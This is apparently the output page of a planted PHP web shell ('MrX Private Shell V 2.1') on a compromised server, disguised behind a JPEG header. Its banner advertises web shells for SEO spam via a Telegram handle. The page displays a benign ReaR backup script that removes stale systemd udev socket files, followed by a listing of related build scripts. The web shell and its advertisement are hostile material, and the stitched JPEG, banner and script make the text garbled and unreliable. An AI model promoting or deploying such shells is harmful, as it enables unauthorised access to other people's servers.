����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# our skel/default/usr/lib/systemd/system/udev* or systemd-udev* definitions are both trying to start
# and that gives too much errors (non critical), but still very annoying
test -d $ROOTFS_DIR/usr/lib/systemd/system || return 0
# Fedora17: be aware these files are links!
# --------
# ls /usr/lib/systemd/system/sockets.target.wants/
#dbus.socket systemd-initctl.socket systemd-journald.socket systemd-shutdownd.socket udev-control.socket udev-kernel.socket
# in our ReaR skel directory we have:
# ls sockets.target.wants/
#dbus.socket systemd-journald.socket systemd-shutdownd.socket systemd-udevd-kernel.socket udev-kernel.socket
#syslog.socket systemd-logger.socket systemd-udevd-control.socket udev-control.socket
Log "Cleaning up systemd udev socket files"
my_udev_files=( $(find $ROOTFS_DIR/usr/lib/systemd/system/sockets.target.wants -type l -name "*udev*" -printf "%P\n") )
for m in "${my_udev_files[@]}" ; do
if [[ ! -h /lib/systemd/system/sockets.target.wants/$m ]] && [[ ! -h /usr/lib/systemd/system/sockets.target.wants/$m ]]; then
rm $v -f $ROOTFS_DIR/usr/lib/systemd/system/sockets.target.wants/$m >&2
fi
done
# remove the udev* files if these do not exist on this system (these were coming from the skel directory)
my_udev_files=( $(find $ROOTFS_DIR/usr/lib/systemd/system -type f -name "udev*" -printf "%P\n") )
for m in "${my_udev_files[@]}" ; do
if [[ ! -f /lib/systemd/system/$m ]] && [[ ! -f /usr/lib/systemd/system/$m ]]; then
rm $v -f $ROOTFS_DIR/usr/lib/systemd/system/$m >&2
fi
done
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 005_create_symlinks.sh | File | 1.36 KB | 0644 |
|
| 090_create_lib_directories_and_symlinks.sh | File | 486 B | 0644 |
|
| 100_copy_as_is.sh | File | 11.61 KB | 0644 |
|
| 110_touch_empty_files.sh | File | 401 B | 0644 |
|
| 130_create_dotfiles.sh | File | 2.19 KB | 0644 |
|
| 150_adjust_permissions.sh | File | 213 B | 0644 |
|
| 390_copy_binaries_libraries.sh | File | 7.63 KB | 0644 |
|
| 400_copy_modules.sh | File | 17.66 KB | 0644 |
|
| 420_copy_firmware_files.sh | File | 2.92 KB | 0644 |
|
| 450_symlink_mingetty.sh | File | 266 B | 0644 |
|
| 600_verify_and_adjust_udev.sh | File | 4.11 KB | 0644 |
|
| 610_verify_and_adjust_udev_systemd.sh | File | 1.53 KB | 0644 |
|
| 620_verify_os_release_file.sh | File | 453 B | 0644 |
|
| 630_simplify_systemd_reboot_halt_poweroff_shutdown.sh | File | 3.06 KB | 0644 |
|
| 630_verify_resolv_conf_file.sh | File | 6 KB | 0644 |
|
| 640_verify_lvm_conf.sh | File | 1.18 KB | 0644 |
|